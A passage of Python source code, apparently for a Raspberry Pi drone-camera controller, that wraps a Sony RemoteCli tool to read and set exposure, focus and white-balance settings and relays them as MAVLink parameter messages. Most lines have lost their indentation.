idx = 99999
itemNo += 1
return answers
def set_sony_still_cap( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_still_cap/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Still_Capture_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Still_Capture_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_focus_area( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/get_focus_dist/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Focus_Area_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Focus_Area_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_iso( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/get_iso/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "ISO_Format"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('ISO_Format') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_shut_spd( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/get_shutter/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Shutter_Value"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Shutter_Value') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
# ======================= new additions to the class ================================================
    def setSonyObjData( self, mem, camDataPointVal, Timeout = 20 ):
        # write the value read back from the camera into the shared memoryValue object
        # and report whether the write went through
        if mem.set_value(camDataPointVal, mem.STATE_CAM_WRITING, Timeout) == True:
            return True
        else:
            print("value has not been successfully set")
            return False
def initSonyCamExProData( self ):
ans = self.get_sony_ex_pro( )
if not (ans is None):
if (len(ans) > 0):
print(f" Exposure Prog Mode = {ans}")
try:
SonyObject = memoryValue('sonyExProMode',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyExProMode',0)
else:
print("Failed get the camera ExPro")
SonyObject = memoryValue('sonyExProMode',0)
else:
print("Cant get Exposure Prog Mode ")
SonyObject = memoryValue('sonyExProMode',0)
return SonyObject
def getSonyCamExProData( self, mem ):
ret = False
ans = self.get_sony_ex_pro( )
if not (ans is None):
if (len(ans) > 0):
print(f" exposure program mode = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the exposure program mode")
else:
print("Cant get Exposure Prog Mode ")
return ret
def initSonyApertureData( self ):
ans = self.get_sony_aperture( )
if not (ans is None):
if (len(ans) > 0):
print(f" Aperture = {ans}")
try:
SonyObject = memoryValue('sonyAperture',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyAperture',0)
else:
print("Failed get the camera aperture")
SonyObject = memoryValue('sonyAperture',0)
else:
print("Cant get Aperture ")
SonyObject = memoryValue('sonyAperture',0)
return SonyObject
def getSonyApertureData( self, mem ):
ret = False
ans = self.get_sony_aperture( )
if not (ans is None):
if (len(ans) > 0):
print(f" aperture = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the aperture")
else:
print("Cant get aperture ")
return ret
def initSonyCamFocusData( self ): ###### @@11
ans = self.get_sony_focus( )
if not (ans is None):
if (len(ans) > 0):
print(f" Focus Mode = {ans}")
try:
SonyObject = memoryValue('sonyFocusMode',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyFocusMode',0)
else:
print("Failed get the camera focus mode")
SonyObject = memoryValue('sonyFocusMode',0)
else:
print("Cant get Focus Mode ")
SonyObject = memoryValue('sonyFocusMode',0)
return SonyObject
def getSonyCamFocusData( self, mem ):
ret = False
ans = self.get_sony_focus( )
if not (ans is None):
if (len(ans) > 0):
print(f" focus = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the focus")
else:
print("Cant get focus ")
return ret
def initSonyCamFocusAreaData( self ):
ans = self.get_sony_focus_area( )
if not (ans is None):
if (len(ans) > 0):
print(f" Focus Area = {ans}")
try:
SonyObject = memoryValue('sonyFocusArea',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyFocusArea',0)
else:
print("Failed get the camera focus area")
SonyObject = memoryValue('sonyFocusArea',0)
else:
print("Cant get Focus Mode ")
SonyObject = memoryValue('sonyFocusArea',0)
return SonyObject
def getSonyCamFocusAreaData( self, mem ):
ret = False
ans = self.get_sony_focus_area( )
if not (ans is None):
if (len(ans) > 0):
print(f" ISO = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the iso")
else:
print("Cant get focus area ")
return ret
def initSonyCamISOData( self ):
ans = self.get_sony_iso( )
if not (ans is None):
if (len(ans) > 0):
print(f" ISO = {ans}")
try:
SonyObject = memoryValue('sonyISO',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyISO',0)
else:
print("Failed get the camera iso")
SonyObject = memoryValue('sonyISO',0)
else:
print("Cant get ISO ")
SonyObject = memoryValue('sonyISO',0)
return SonyObject
def getSonyCamISOData( self, mem ):
ret = False
ans = self.get_sony_iso( )
if not (ans is None):
if (len(ans) > 0):
print(f" ISO = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the iso")
else:
print("Cant get iso ")
return ret
def initSonyCamShutSpdData( self ):
ans = self.get_sony_shut_spd( )
if not (ans is None):
if (len(ans) > 0):
print(f" Shutter Speed = {ans}")
try:
SonyObject = memoryValue('sonyShutSpd',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyShutSpd',0)
else:
print("Failed get the camera iso")
SonyObject = memoryValue('sonyShutSpd',0)
else:
print("Cant get Shutter Speed ")
SonyObject = memoryValue('sonyShutSpd',0)
SonyObject.updateNeeded = True
return SonyObject
def getSonyCamShutSpdData( self, mem ):
ret = False
ans = self.get_sony_shut_spd( )
if not (ans is None):
if (len(ans) > 0):
print(f" Shutter Speed = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the shutter speed")
else:
print("Cant get shutter speed ")
return ret
def initSonyCamWhiteBalaData( self ):
ans = self.get_sony_white_balance( )
if not (ans is None):
if (len(ans) > 0):
print(f" White Balance = {ans}")
try:
SonyObject = memoryValue('sonyWhiteBalance',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyWhiteBalance',0)
else:
print("Failed get the camera white balance")
SonyObject = memoryValue('sonyWhiteBalance',0)
else:
print("Cant get Shutter Speed ")
SonyObject = memoryValue('sonyWhiteBalance',0)
return SonyObject
def getSonyCamWhiteBalaData( self, mem ):
ret = False
ans = self.get_sony_white_balance( )
if not (ans is None):
if (len(ans) > 0):
print(f" White Balance = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the camera white balance")
else:
print("Cant get white balance ")
return ret
def initSonyCamStillCapModeData( self ):
ans = self.get_sony_still_cap_mode( )
if not (ans is None):
if (len(ans) > 0):
print(f" Still Cap Mode = {ans}")
try:
SonyObject = memoryValue('sonyStillCapMode',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyStillCapMode',0)
else:
print("Failed get the camera still capture mode")
SonyObject = memoryValue('sonyStillCapMode',0)
else:
print("Cant get Still Capture Mode ")
SonyObject = memoryValue('sonyStillCapMode',0)
return SonyObject
def getSonyCamStillCapModeData( self, mem ):
ret = False
ans = self.get_sony_still_cap_mode( )
if not (ans is None):
if (len(ans) > 0):
print(f" Still Cap Mode = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the camera still capture mode")
else:
print("Cant get still cap mode ")
return ret
    # -------------------------------------------------------------------------------------------
    # enumerate_* helpers: translate a requested value into the camera enumeration index.
    # Only a handful of mappings are present here; values without a mapping are passed
    # through unchanged so the calling set methods still receive something usable.
    # -------------------------------------------------------------------------------------------
    def enumerate_still_cap( self, num ):
        if num == 65543:
            return 2
        return num
    def enumerate_aperture( self, num ):
        if num == 280:
            return 0
        return num
    def enumerate_iso( self, num ):
        enum_num = num                      # unknown ISO values pass straight through
        if num == 0:
            enum_num = 0
        elif num == 50:
            enum_num = 1
        elif num == 64:
            enum_num = 2
        elif num == 80:
            enum_num = 3
        elif num == 100:
            enum_num = 4
        elif num == 125:
            enum_num = 5
        elif num == 160:
            enum_num = 6
        elif num == 200:
            enum_num = 7
        elif num == 250:
            enum_num = 8
        elif num == 320:
            enum_num = 9
        return enum_num
    def enumerate_ex_pro( self, num ):
        if num == 32859:
            return 2
        return num
    def enumerate_focus_area( self, num ):
        if num == 1:
            return 0
        return num
    def enumerate_focus( self, num ):
        if num == 2:
            return 0
        return num
    def enumerate_shutter( self, num ):
        if num == 0:
            return 0
        return num
    def enumerate_white_bal( self, num ):
        if num == 0:
            return 0
        return num
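    # -------------------------------------------------------------------------------------------
    # Sketch (hypothetical): the per-setting enumerate_* methods above could be collapsed into a
    # single table-driven lookup. The ISO table repeats the values already listed above; the
    # other tables only contain the single entries present there and would need the full camera
    # enumerations to be useful.
    # -------------------------------------------------------------------------------------------
    ENUM_TABLES = {
        'iso': {0: 0, 50: 1, 64: 2, 80: 3, 100: 4, 125: 5, 160: 6, 200: 7, 250: 8, 320: 9},
        'still_cap': {65543: 2},
        'aperture': {280: 0},
        'ex_pro': {32859: 2},
        'focus_area': {1: 0},
        'focus': {2: 0},
        'shutter': {0: 0},
        'white_bal': {0: 0},
    }
    def enumerate_setting( self, setting, num ):
        # return the enumeration index for num, or num unchanged when it has no table entry
        return self.ENUM_TABLES.get(setting, {}).get(num, num)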
def setSonyCamISOData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_iso(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1 # no retries
print(f"set to ISO {reqDat} {prevDat}")
        if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_iso( self.enumerate_iso(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_iso(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2 # no retries
ret = ( ans[1] == reqDat )
#exit(101)
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamApertureData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_aperture(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1 # no retries
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
            ans = self.set_sony_aperture( self.enumerate_aperture(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_aperture(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2 # no retries
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamExProData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_ex_pro(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_ex_pro( self.enumerate_ex_pro(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_ex_pro(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamFocusData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_focus(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_focus( self.enumerate_focus(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_focus(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamFocusAreaData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_focus_area(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_focus_area( self.enumerate_focus_area(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_focus_area(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamShutSpdData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_shutter(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_shutter( self.enumerate_shutter(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_shutter(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamWhiteBalaData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_white_bal(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_white_bal( self.enumerate_white_bal(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_white_bal(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamStillCapModeData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_still_cap_mode(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_still_cap( self.enumerate_still_cap(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_still_cap_mode(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
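#
# all of the setSonyCam*Data methods above follow the same read -> enumerate -> write-back pattern:
# read the requested value from the shared mavlink write object, convert it with the matching
# enumerate_* lookup, push it to the camera, then mirror the confirmed value into fast memory.
# a hedged usage sketch (names are illustrative only: `cam` is this camera class, `isoMem` a
# memoryValue object and `mavWrites` the shared mavlinkSonyCamWriteVals instance):
#
#   if cam.setSonyCamISOData(isoMem, mavWrites):
#       print("ISO written to the camera and cached")
#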
#
# would go into mavlink class if it was in multi-tasking mode
#
def sendMavlinkMessageForObject( self, obj, the_connection, Timeout=5 ):
ret = False # default result when no update is needed or the read of the object fails
if (obj.updateNeeded == True):
# send mavlink message obj.name obj.signal obj.numberOfVals
#
getName, getValueforMAVSending, getPrev, myState = obj.get_value_data(obj.STATE_MAV_READING, Timeout)
if (myState == True):
try:
the_connection.mav.param_value_send(
getName.encode('ascii'),
getValueforMAVSending,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
obj.numberOfVals,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message : %s" % (err_msg))
ret = False
if (ret == True):
writeSuccess = False
TimeCount = 0
while (writeSuccess == False) and (Timeout > TimeCount):
# obj.updateNeeded = False
writeSuccess = obj.set_update_flag( False, obj.STATE_MAV_WRITING )
TimeCount += 1
return ret
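#
# usage sketch (hedged: `cam` is this camera class and `obj` is one of the camera parameter
# objects used elsewhere in this file, i.e. something exposing updateNeeded, get_value_data()
# and set_update_flag()); the helper packs the parameter into a PARAM_VALUE message:
#
#   if obj.updateNeeded:
#       cam.sendMavlinkMessageForObject(obj, the_connection, Timeout=5)
#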
#
# Pymavlink Library
# Acknowledgements:
# Thank you to Andrew Tridgell, the mastermind behind pymavlink and MAVProxy
# Thread code from http://stackoverflow.com/questions/730645/python-wxpython-doing-work-continuously-in-the-background
# Serial port code taken from http://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python
# UDP http://snakeproject.ru/rubric/article.php?art=python_udp_network_server_client
# AirCamPro :- 21/10/21 support android kivy serial driver
#
# when you install pymavlink you also need to use mavgen to generate the libraries
# instructions are shown here
# https://mavlink.io/en/mavgen_python/
# https://github.com/ArduPilot/pymavlink/blob/master/mavutil.py
# ref to multi-threading using asyncio
#
# https://python-scripts.com/sleep#threading-event
# vasile.buldumac@ati.utm.md
#
# sudo apt-get install python3-dev python3-opencv python3-wxgtk4.0 python3-pip python3-matplotlib python3-lxml
# sudo apt-get install libxml++2.6-dev
# sudo pip install dronekit
# ================== Compatible Joysticks =========================================
# X-Box 360 Controller (name: "Xbox 360 Controller")
# Playstation 4 Controller (name: "PS4 Controller")
# X-Box 360 Controller (name: "Controller (XBOX 360 For Windows)")
#
from pymavlink import mavutil # ref:- https://www.ardusub.com/developers/pymavlink.html
#import wx
import sys, serial, glob, threading
# for serial message out packing
import struct
# this is included for android serial and to detect the android platform using kivy
# ref:- https://github.com/frmdstryr/kivy-android-serial
# install kivy with the following in your conda environment
# conda install kivy -c conda-forge
#from kivy.utils import platform
# from kvserial.driver import CdcAcmSerialPort
# to list ports using the serial library
from serial.tools import list_ports
BUTTON_CONNECT = 10
BUTTON_ARM = 20
# ethernet UDP communication and joystick
#
# python3 -m pip install -U pygame --user
import socket
import pygame
JOYSTICK_UDP_PORT = 14556
JOY_SCALE = 1000
MAX_SCALE = 32767
X_MAX = MAX_SCALE
Y_MAX = MAX_SCALE
MAV_TARGET = 110
MAV_SOURCE = 30
# import pymavlink.dialects.v10.lapwing as mavlink
# this is a custom dialect which i cant find
# this chooses version 1 you would need to change the ACK function TODO
#
# from mavlink_python_libs import com1 as commonV1
# import com1 as mavdefs
#
#from mavlink_python_libs import com2 as commonV1
#from my_python_libs import com2 as commonV1
#import com2 as mavdefs
import math
import time
import array as arr
#from mypymavlink import mavutilcust as custommav
#
# multithreading control via asyncio
#
import asyncio
import time
import numpy as np
import os
# ============== control Raspberry Pi IO ===============
# sudo apt-get install rpi.gpio
#
#import RPi.GPIO as GPIO
# to use Raspberry Pi board pin numbers
#GPIO.setmode(GPIO.BOARD)
# set up the GPIO channels - one input and one output here
#GPIO.setup(11, GPIO.IN)
#GPIO.setup(12, GPIO.OUT)
#---------------------------------------------------------------------------
class fifo(object):
def __init__(self):
self.buf = []
def write(self, data):
self.buf += data
return len(data)
def read(self):
return self.buf.pop(0)
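#
# the fifo above is a minimal in-memory file object: a MAVLink() instance only needs something
# with a write() method when it is used purely to pack messages (see joyMavlinkInit further down).
# sketch, mirroring how it is used later in this file:
#
#   mav = mavutil.mavlink.MAVLink(fifo())
#   mav.srcSystem = 30
#   msg = mavutil.mavlink.MAVLink_manual_control_message(target=110, x=0, y=0, z=500, r=0, buttons=0)
#   msgbuf = msg.pack(mav)   # bytes ready to be sent over UDP or serial
#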
import re
# mavlink communicator class (without GUI)
#
class MAVFrame():
RCV_COMMAND = mavutil.mavlink.MAV_CMD_REQUEST_MESSAGE
RPM2 = 0
ACK_RESULT = mavutil.mavlink.MAV_RESULT_UNSUPPORTED
DEFAULT_SYS_ID = 1
ACK_ALL_DATA_COMPLETE = 99
CAMERA_INFORMATION = 259 #camera_information
CAMERA_SETTINGS = 260
STORAGE_INFORMATION = 261
CAMERA_CAPTURE_STATUS = 262
CAMERA_IMAGE_CAPTURED = 263
VIDEO_STREAM = 269
# camera informations (default camera routines will retrieve this)
time_boot_ms = 1
firmware_version = 12
focal_length = 1.1
sensor_size_h = 3.0
sensor_size_v = 4.0
flags = 4
resolution_h = 300
resolution_v = 400
cam_definition_version = 2
#vendor_name_nd = np.dtype([('A',np.uint8)])
#model_name_nd = np.dtype([('B',np.uint8)])
#vendor_name_list = [65]
#model_name_list = [67]
#vendor_name = "A"
#model_name = "B"
lens_id = 1
cam_definition_uri = "http://10.0.2.51/cam_defs"
# camera settings
mode_id = 3 # Camera mode
zoomLevel = 7 # Current zoom level (0.0 to 100.0, NaN if not known)
focusLevel = 9
# storage informations
total_capacity = 1.2 # [MiB] Total capacity. If storage is not ready (STORAGE_STATUS_READY) value will be ignored.
used_capacity = 1.1 # [MiB] Used capacity. If storage is not ready (STORAGE_STATUS_READY) value will be ignored.
available_capacity = 0.1 # [MiB] Available storage capacity. If storage is not ready (STORAGE_STATUS_READY) value will be ignored.
read_speed = 0.67 # [MiB/s] Read speed.
write_speed = 0.76 # [MiB/s] Write speed.
storage_id = 1 # Storage ID (1 for first, 2 for second, etc.)
storage_count = 2 # Number of storage devices
status = 0
#status = mavutil.mavlink.STORAGE_STATUS_READY
# camera capture status
image_interval = 3.3 # [s] Image capture interval
recording_time_ms = 10000 # [ms] Time since recording started
available_capacity = 0.34 # [MiB] Available storage capacity.
image_status = 1 # Current status of image capturing (0: idle, 1: capture in progress, 2: interval set but idle, 3: interval set and capture in progress)
video_status = 1 # Current status of video capturing (0: idle, 1: capture in progress)
image_count = 11
# video stream
framerate = 30.0 # [Hz] Frame rate.
bitrate = 3000 # [bits/s] Bit rate.
Vflags = 3 # Bitmap of stream status flags.
Vresolution_h = 300 # [pix] Horizontal resolution.
Vresolution_v = 400 # [pix] Vertical resolution.
rotation = 90 # [deg] Video image rotation clockwise.
hfov = 45 # [deg] Horizontal Field of view.
stream_id = 2 # Video Stream ID (1 for first, 2 for second, etc.)
count = 4 # Number of streams available.
stream_type = mavutil.mavlink.VIDEO_STREAM_TYPE_MPEG_TS_H264 # Type of stream.
videoname = "vid_001"
video_uri = "http://10.0.0.56/vids/001.mov"
# camera image captured
time_utc = 667700 # [us] Timestamp (time since UNIX epoch) in UTC. 0 for unknown.
lat = 30 # [degE7] Latitude where image was taken
lon = 40 # [degE7] Longitude where capture was taken
alt = 11 # [mm] Altitude (MSL) where image was taken
relative_alt = 12 # [mm] Altitude above ground
q = [1,0,0,0] # Quaternion of camera orientation (w, x, y, z order, zero-rotation is 0, 0, 0, 0)
